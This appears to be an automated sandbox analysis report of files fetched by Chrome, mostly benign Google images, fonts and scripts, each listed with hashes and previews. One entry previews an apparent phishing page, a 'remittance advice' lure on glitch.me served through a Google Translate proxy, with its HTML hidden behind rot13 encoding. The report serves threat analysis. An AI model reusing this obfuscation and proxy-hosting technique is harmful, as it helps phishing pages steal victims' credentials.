                                                                                                                                                                                                                                                            Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                            MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                            SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                            SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                            SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 1440x960, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):266842
                                                                                                                                                                                                                                                            Entropy (8bit):7.97786893984036
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:fL6Dq4Hm9P+1PT8JfafaM+Za6DkVp+YNlCLHSF7GCZ59EbR/zdS/O:Wqkm9UPTOfVUikVEel6HyGDlzqO
                                                                                                                                                                                                                                                            MD5:F2B91185EB0C95055C5358880BF805E9
                                                                                                                                                                                                                                                            SHA1:7C8E53CEBB2D9BCF0CABAD19481CB3FA7EE1AC2F
                                                                                                                                                                                                                                                            SHA-256:EC18AA822EE3A58D595305F2988FCAF99A8A871172306CFE96D42CBD0EC2C970
                                                                                                                                                                                                                                                            SHA-512:417E43A705F78B8C8C087BEBFAC8701197B1F90A67301A0B79DA9815B90891140FDD132E60F63A655B20C5AC24047534160FEF9DCEB970BA9900B50CF664DDC0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/XH1nTzt31w0D2Mh0RIwO57SRWR9xEGnCj9PIt7H6OIWfZJNhuCQTrBJWbzzcr5x1NrYFu2Tshk-YURNywcKeUbL7Syamsfqb1ZAh9MTTnQVKJavTNHIy=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.....................................................................................................................................................".........................................M......................!1..A..Qaq.."...2....B....#Rr3b.$C.....4Sc...%DT....d.................................7.......................!1.A"Qaq..2..B..#....3..R.b.r$........
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1440x810, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):247632
                                                                                                                                                                                                                                                            Entropy (8bit):7.9741850940850965
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:qmQArlYBhABXXLLSfGCgWCoPTxwGb41bctT2PB0:qsl+hIX3EGDeGG+bcJSB0
                                                                                                                                                                                                                                                            MD5:7F1A79E3F6225F89688FA67575A4B356
                                                                                                                                                                                                                                                            SHA1:F9F2478CD0478003FB27B97FEAE3C1D470B96641
                                                                                                                                                                                                                                                            SHA-256:697F1577FEF4B9F3942A2DAF1F8B8171F289A177E8AE368EB1DB63DC3E021370
                                                                                                                                                                                                                                                            SHA-512:912162341A1028FE7AE2B74880591BBACC38AE7FEB084322B9D72499862214B67D7996556003FD1AEBD0DC9B037F4454050F16E8DA07D16F372C6DEF1D096BA7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/4vIWhSoCMzWHL20aDe5EGrv5EypSOWfQjoeBfA9Z32YCinijg5J0S1Sn6FN2uTgbm_A0X0khZHn3Btl2djAqyaXjXpHyADHl4mnlIbc0GRutLqLENkU=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................*....".........................................H......................!1..AQ.aq.."....2...B....R.#b.r3......$CS.c...%4................................8......................!..1AQ.."aq...2.......#B..R$3b.%............?..q._.EIM.>J."#..,E...\b..h.$4u*.4....K..j..{..(T.[~`.(.....N..nt..rPf(%S.R?J..E...1.@K..O.X.F....K..\>:t.x.R0..!s........&..x..Y.im|.-Z...h&....ZeKL.`."Z....`....F.....p.\.Z%..$.....I.A....Ib.h.q..*.Z.i.m{R.^&v%IJ.:b.R..IUY#A...".K.."G..J..U..}.=B}#...#..r.pC....-...K.Z..{D^W!.=.)..J)...I+.R .!k[Q.T..S......L...\(...$eK.?......4..L...X..Q.F.A..$H.Y....uIu*.~..2.J.6.....P.3T.:Q4<...O.....3.`...e.P.:..K..R.*.y...4R..O...V..'.......*p?..b........1...j........5../......;..-I...>bZ...~U.y.h.q^".....YD...K...b..........@a..7c8E.GHm.....U+..:A.0..@$;fj.........".u.w.{.h.h....W.Z.#"X.9'5.!:1..33.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, software=Picasa], baseline, precision 8, 660x255, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):47132
                                                                                                                                                                                                                                                            Entropy (8bit):7.970081285983661
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:j6oJ4BooN98eR14atGQWJjiWokMDOfdVoMs0KwlsbIZcchbK8q+:GoJhov8esmWd0kU0sMsIlohchrq+
                                                                                                                                                                                                                                                            MD5:B9B2AB9C33B5891752AC57029CF246A0
                                                                                                                                                                                                                                                            SHA1:B674F1AFB9A82E422375DD7C20C4BE7E983396D6
                                                                                                                                                                                                                                                            SHA-256:44FBB0BBCD635DB2DDDD5082E46D28135691FD1D88E3F8AC20292CEF027D88A1
                                                                                                                                                                                                                                                            SHA-512:DF9C1622244D62DAEF319AF9F8F26452C7063578EEBE24CA00354D25413CD09CBE7D11FC4A53E611B00CB88120163CE473586ED309CE02A8BBE066EFE48FE702
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............RExif..II*.......1.......&...;.......-.......Picasa.Jon Wiley and Micheal Lopez..............................................................................................................................................................................................e............................!1."AQ.aq...#2R..3Bbr.....$CSsu.....46c.......%5DTVt......&....EUe.d.................................)......................!1AQq........a.".............?...E6.y.9kQ.uDt..hi^S.7.x..8L...*. ..P.h...F..........].4....Et....d.5K....a......9*.vD`.n7~.n.e.f9d.42.$..'..Hg....b.;....U.:;...F....I.c.....TDQvff!UT.K....W].v....(...........t..z...Q..#.".h...R.........j.. 1E5.*.dcI.).:r.....*.D.A..u%x...sI..GYE:TS...!.G&GS.T7W..0*..F ~....}.,2TTK..B.If..G./2..@.z.(..K.vY....#,.I".<.c..V*..QcO:.....H.H...(_.,.x.n.yM.o.X.$...mz80QT]DQ9..PC.D..n.k......]U...ee!....+...7......oo{.Y-..V..E.(..j.lJ...5..$.TP......7n7~ty..US0Y@QUJ......X.BA...$..,C*...|.[...\.y...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1254
                                                                                                                                                                                                                                                            Entropy (8bit):5.066197194954144
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:t4LsQfefL1bAjUDAh9Q36tg8anACOIYeACxNaADwH4KV7875B7X4KrU:+X2fKPi6eLTYeACXXwHj7qNX5U
                                                                                                                                                                                                                                                            MD5:D083C5690DC37F8B7A238A18F195D8A0
                                                                                                                                                                                                                                                            SHA1:3C5E3262B7150E80FA9036338395EF04D8245A46
                                                                                                                                                                                                                                                            SHA-256:C2790158F77DF106A523639CEF09BD263A9AE747B9004AC214ACE25DD0D4CBD7
                                                                                                                                                                                                                                                            SHA-512:A7A953FC1F6E26694D4324C344B069F48D4FEDCEBCA296AE28F79A0BBBB70FB5C28DC84D96625E5389D05C1AD35D77BE302855FAF4032C0F6FFCACA3E1E55816
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" enable-background="new 0 0 192 192" height="192" viewBox="0 0 192 192" width="192"><g><defs><rect height="192" id="SVGID_1_" width="192"/></defs><clipPath id="SVGID_2_"><use overflow="visible" xlink:href="#SVGID_1_"/></clipPath><g clip-path="url(#SVGID_2_)"><path d="M121.11,60.87l5.89,0.11l16.01-16.01l0.78-6.78C131.07,26.87,114.33,19.98,96,19.98 c-33.19,0-61.18,22.57-69.48,53.17c1.75-1.21,5.48-0.31,5.48-0.31l32-5.26c0,0,1.66-2.72,2.47-2.55 C73.79,57.02,84.32,51.98,96,51.98C105.5,51.98,114.24,55.32,121.11,60.87z" fill="#EA4335"/><path d="M165.5,73.19c-3.71-13.72-11.39-25.82-21.72-35.01l-22.68,22.68C130.18,68.2,136,79.42,136,91.98v4 c11.03,0,20,8.97,20,20s-8.97,20-20,20H96L92,140v24l4,3.98h40c28.67,0,52-23.33,52-52C188,98.25,179.08,82.58,165.5,73.19z" fill="#4285F4"/><path d="M56,167.98h39.97v-32H56c-2.94,0-5.72-0.65-8.24-1.8L42,135.95l-16.02,16.02l-1.4,5.41 C33.31,164.02,44.2,167.98,56,167.98z" fill="#34A
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):32988
                                                                                                                                                                                                                                                            Entropy (8bit):3.7980479441426356
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:qoc51d1ocG7izw6FdV4qZoW/CnJWjYSMyABwfUqpY940/3E:VcXvoAmtw
                                                                                                                                                                                                                                                            MD5:A388ABC14CE81AB733AE69A804E87880
                                                                                                                                                                                                                                                            SHA1:A80914F192FDF163AA52DE8C0265D202721B1144
                                                                                                                                                                                                                                                            SHA-256:06FD4BA3B981A0765DC1E8FCD5AA2FAF802323D5367D7CA0B8AFB7F896F2E81F
                                                                                                                                                                                                                                                            SHA-512:3F4C53087C54E5B15F342D4982BC2E01F14F92E32417433C51F9967E3B46F88922831D2CCE4AD5F9A87855586A75F14F49792623C2FB0BDD187C474628641EE1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://ssl.gstatic.com/translate/favicon.ico
                                                                                                                                                                                                                                                            Preview:......@@.... .(@..F... .... .(...n@........ .(....P........ .(....Y..(...@......... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................xd...................................................................................................qq.......................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 35060, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):35060
                                                                                                                                                                                                                                                            Entropy (8bit):7.9934247518702914
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:768:VWgzOJq8VMlI+d620JaSUhkJN1tLmkLqnEsKeeBClx7styedpa12:dSJBVMlfd6VJaSUCv1RmkavKetUXnZ
                                                                                                                                                                                                                                                            MD5:0360DBC6E8C09DCE9183A1FD78F3BE2E
                                                                                                                                                                                                                                                            SHA1:6CD4B65A94707AE941D78B12F082C968CB05EC92
                                                                                                                                                                                                                                                            SHA-256:2DB6BC36808D43FA89029C652636E206FA3E889B35ECF71814AB85F8BA944AF3
                                                                                                                                                                                                                                                            SHA-512:93C9F1856142DA0709F807CA3E5836065E61BC8160F9281FEC9244F31ED8AE8DF500CD5C64048AC59B4DBC36EBD18BA8E7FBCEEF58134DD76441079FAE147AB9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/productsans/v19/pxiDypQkot1TnFhsFMOfGShVF9eO.woff2
                                                                                                                                                                                                                                                            Preview:wOF2..............u$..............................T....`..P.l..a.....D..;.."......6.$..@. ..,..6...[.]q..}:P..(....W.(........(;h 8..r.o...........k..........>..eZT\K.....4l..Z]...1B.1.G.....|..p..._..S/...^I.e..l.=.I1...0..L./..D..Y{.w...*.(.....Q..J....v.........z......Q/.K..f._...-..T.f...[..U.).>.K35v...n.?-thr......w.?[D.u.Q.}..i_.cp..0E.R5m.>I.......x......H."C,....2...q...E..r.?...R../.J..m..X97...E.fJ...=.Q.>..`.QXuw..e."........\^.....~....>M.....h.Q.-.......SM,;W......#..#.B.....K.o...`...z...t....".$..s....o.v...w.I.mg.$n....../...N.....8H........^.~....X.Q.,YB.U...uX.e.o.l..o.2f..^_].~.3w*........J$2)_.c8...&^.>...r.29.D&.I....T".H....O.2.$..r.\...1.}.ES~5...t.X`.x.gQk..e.L.N......{.6...4..G.....2.z...V...Vy.'..../.....'...z..i.G.......`...$@.k......1.....{PH.....qf......_...A.e..7.....C.?.^.....,......NDa<b..*F...:.....+..|.._I+.2.^......l...3..^.)qJ...0.....X.....yj....J"...lo..._j...Z...0...m..2.$.EBa.....w...|..2&!.$..!S/^'..*...r.U-.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3200)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):36262
                                                                                                                                                                                                                                                            Entropy (8bit):5.362458156217949
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Fn7AJQsDpxzcVX0PUchKV6uAShTRJtBhy:Fn4hU8Y6uLdhy
                                                                                                                                                                                                                                                            MD5:3B4257EDC4AB4744BEB648D394EBAD0E
                                                                                                                                                                                                                                                            SHA1:7F4F00EC5A27DBFDAF564D1C438644E0D28BF3B3
                                                                                                                                                                                                                                                            SHA-256:76B44CFFD0F76E2527015894C3B240102329729F9C5B8BF151BF8A5B7084856A
                                                                                                                                                                                                                                                            SHA-512:6A8D459989038B772D9A5F4C26694AD056E5F41ED63204EBE3B8B15414D95712C90C7D14AA7E9CFF15C98B3B6F29ED8ABAFD72BED063007DF561BCDB27B11F8B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/brandstudio/kato/cookie_choice_component/cookie_consent_bar.v3.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},p="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ca=ba(this),q=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&p(c,a,{configurable:!0,writable:!0,value:b})}};.q("Symbol",function(a){if(a)return a;var b=function(f,l){this.ya=f;p(this,"description",{configurable:!0,writable:!0,value:l})};b.prototype.toString=function(){
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1490)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):50234
                                                                                                                                                                                                                                                            Entropy (8bit):5.521600788203435
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:HvzanvBCwsN7sP5XqYTL+CyfnHOlTjtlnone2V6KHmCgYUD0ZTXEwyVfZs6:ranv1r5hTiDHO9tlnop7UwyVN
                                                                                                                                                                                                                                                            MD5:54E51056211DDA674100CC5B323A58AD
                                                                                                                                                                                                                                                            SHA1:26DC5034CB6C7F3BBE061EDD37C7FC6006CB835B
                                                                                                                                                                                                                                                            SHA-256:5971B095CFF574A66D35ADA016D4C077C86E2DEA62E9C0F14CF7C94B258619DE
                                                                                                                                                                                                                                                            SHA-512:E305D190287C28CA0CC2E45B909A304194175BB08351AD3F22825B1D632B1A217FB4B90DFD395637932307A8E0CC01DA2F47831FA4EDA91A18E49EFE6685B74B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa=this||self,n=function(a,b){a=a.split(".");var c=aa;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};var p=function(a,b){for(var c in b)b.hasOwnProperty(c)&&(a[c]=b[c])},q=function(a){for(var b in a)if(a.hasOwnProperty(b))return!0;return!1};function t(){for(var a=u,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function v(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var u,w;.function ba(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=w[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}u=u||v();w=w||t();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&2
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65212)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):78652
                                                                                                                                                                                                                                                            Entropy (8bit):6.133548341930441
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:nu7i8V0YIhKZ80W0Ty5iT4YuuG32U6HMYPYWi6mBFeyuuG32U4ErI9g7rI7j4c:u7i8V0YIhD8XT4YhCNi3i6EFeyhCN4EK
                                                                                                                                                                                                                                                            MD5:F547FB4C847ACF2895921F8CAE11CB0C
                                                                                                                                                                                                                                                            SHA1:63D1CA40076BE45081E97FFE8876DE3354B9FB46
                                                                                                                                                                                                                                                            SHA-256:B668A2FAB093EDC9F6DDFB1FC35804494D0A8C7D9DE0B691081BA1AFB3C90150
                                                                                                                                                                                                                                                            SHA-512:6947E5C0FF7A4AD9C9DA1EC191349AE6BE2AED85AAD462B6C1C1F2B9A8202894B1470351EA1AB9029778AD242201543528C0BF4DEE39DCE84144330E97EB0E1D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp
                                                                                                                                                                                                                                                            Preview:<html lang="auto">. <head>. <base href="https://remittanceadvice-details.glitch.me/remittance.html">. <script type="text/javascript">. // <![CDATA[. function rot13(i){return i.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26)})}. function WriteHTMLtoJS(){. document.write(rot13("<ugzy><urnq></urnq><obql>\n\n\n\n <zrgn punefrg=\"HGS-8\" anzr=\"ivrjcbeg\" pbagrag=\"jvqgu=qrivpr-jvqgu, vavgvny-fpnyr=1.0, znkvzhz-fpnyr=1.0, zvavzhz-fpnyr=1.0, hfre-fpnynoyr=ab\">\n <gvgyr>Funevat Yvax Inyvqngvba</gvgyr>\n <yvax ery=\"fglyrfurrg cersrgpu\" uers=\"uggcf://sbagf.tbbtyrncvf.pbz/pff?snzvyl=Bcra+Fnaf:600\">\n<fglyr>\n\nugzy {\n\tyvar-urvtug: 1.15;\n\t-zf-grkg-fvmr-nqwhfg: 100%;\n\t-jroxvg-grkg-fvmr-nqwhfg: 100%\n}\nobql {\n\turvtug: 100%;\n\tznetva: 0\n}\nnegvpyr, nfvqr, sbbgre, urnqre, ani, frpgvba {\n\tqvfcynl: oybpx\n}\nu1 {\n\tsbag-fvmr: 2rz;\n\tznetva: .67rz 0\n}\nsvtpncgvba, svther, znva {\n\tqvfcynl: oybpx\n}\nsvther {\n
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):36652
                                                                                                                                                                                                                                                            Entropy (8bit):7.976315730771684
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:/oMHf8nLpkkVf72Yx1cPucDLrRILCC/MAo1Tqp7j2f2R52Znw:/oqUnCu53tc3OqNe7j282Zw
                                                                                                                                                                                                                                                            MD5:B6EB5D1049A40925638EA6641752FFAE
                                                                                                                                                                                                                                                            SHA1:D40AD337CF2578FB183E9729C39BFA1D16EFA1A7
                                                                                                                                                                                                                                                            SHA-256:80117705B74B02E5660D4470437074437E003C5FEF9FBE6EE2255740EA7576C8
                                                                                                                                                                                                                                                            SHA-512:6941CA9BB2F64DE83FD4A731615AE909F1213EE688B80E5FB6E4421FAA2DBA2197591A6ED0FDCED8B4B7BD5E16686E0972022AAD2EB593A57FA3EF310AF9E144
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/5ZZkQavSKPzPcj4vg-8DqCs2qofs9BZIzfFtSeY8NlqF4d0bWophZMqW4SSg-MKquK6C5VBTC9dXE1YS5PkUXjlIY9GLFaiLBO3_ywWzKiEqGn_cgQMT
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ...............................................L.........................!1..."AQ..a.#2q.BR...$3b...Sr....Ccs..4Dt..5u...%................................7.......................!1.A..Qa"q..2....B....#3R.b.$S............?...3.%.t6_.j.....*-..LiI...c..4\A@.[P.!.QV|.2.J.,..!Z6K.[.H..."...2i.....6..e..2.jX.O.:o.I.g.).f..v=]#....Sd.K...H..i.4...X....@-..........{,&q.Z..)Z.Q.>.T..._..^..........o.K..gk...1.....C....iM.|.'......4.Qm.4F.c9........a....C....xd.N....P.7.^0C....0...V7X.A(..d.`.'.gWm.....k...MN.i......7......DdP...r..!...%zS.*>.<.5.D.i....z.............jzP.%..H.H.M..".3....P.......*.......8.......D.=9.B..*)...B.l.x.H..z....l..........h....A......*:..b..&.{P1.f.s(.#'.....m.....Y.R)..4....v.V..#...Z.;.....&P.K0...h[=...Z:..x..|.R.!u.t.b..@...K..H...\D.:.."..h.PJ.I!I.E.....U.geY.T5.T].j..nK....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):60408
                                                                                                                                                                                                                                                            Entropy (8bit):4.746090328799968
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:fctDxhgZqb0HZb0HEuZ5V2KKCICtvlc54WA+Vw4G4Fw0RToTQTQDbx4r/MT4gohL:fesZvo2KKVmp29bFhTOG2T4go+9nK8Hm
                                                                                                                                                                                                                                                            MD5:A371D1ADD8D95D9A5AC0222DBFC707DA
                                                                                                                                                                                                                                                            SHA1:B273236FC088B58AEC5BE2E7CD642E290C31CBF3
                                                                                                                                                                                                                                                            SHA-256:0A11003900B5593A71CFAB463C2A5E7D2588B251F697EAE8B64946F4D178FE54
                                                                                                                                                                                                                                                            SHA-512:1C4FC0A64E927A073713435830F9D3044894FFDAF30E6966B28D1F3757D564D6E9124F632EB0B61EA41947973FCB28C82F98696E021A8A827FB96E2FF0D27ACD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://ssl.gstatic.com/support/content/images/static/homepage_header_background_v2.svg
                                                                                                                                                                                                                                                            Preview:<svg width="1280" height="307" viewBox="0 0 1280 307" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="1121.01" cy="217.239" r="27.6618" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1120.58 204.281V292.049" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1120.58 223.588L1130.88 213.286" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1120.39 233.491L1113.06 226.163" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1120.39 217.429L1113.06 210.102" stroke="#D4E1F3" stroke-linecap="round"/>.<circle cx="1132.29" cy="223.588" r="1.69704" stroke="#D4E1F3" stroke-linecap="round"/>.<circle cx="1104.71" cy="210.101" r="1.69704" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1101.26 297.3C1104.15 291.738 1110.46 288.868 1116.55 290.35C1122.63 291.832 1126.92 297.283 1126.93 303.549" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1087.8 303.549C1087.7 300.666 1089.18 297.957 1091.66 296.486C1094.14 295.014 1097.23 295.014 1099.71 296.486C1102.19 297.957 1103
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):724213
                                                                                                                                                                                                                                                            Entropy (8bit):5.137777737733533
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:WIGQ/GQbGQ0k77Ft+OvKdR/km76tmOoKeR2+XC:Wk77Ft+OvKdR/km76tmOoKeR0
                                                                                                                                                                                                                                                            MD5:DF85FEE1497529A49316A851CAEEA26D
                                                                                                                                                                                                                                                            SHA1:9AD158B12A8A28F88EDE686EF06E12139E794CA3
                                                                                                                                                                                                                                                            SHA-256:3847A0D392B23543B0AA39930FC22C46B3DAF9922D7A3312F3E68259157A3401
                                                                                                                                                                                                                                                            SHA-512:FD45BF7728150E1F69DEA8DB95B111030C779B9106CA88E62C1F94376BDCBEF8E58080440EB6832F55DAFA7A520F11ED46941A7F36E8C2791848F44B1A0E5577
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/css/index.min.css?cache=9ad158b
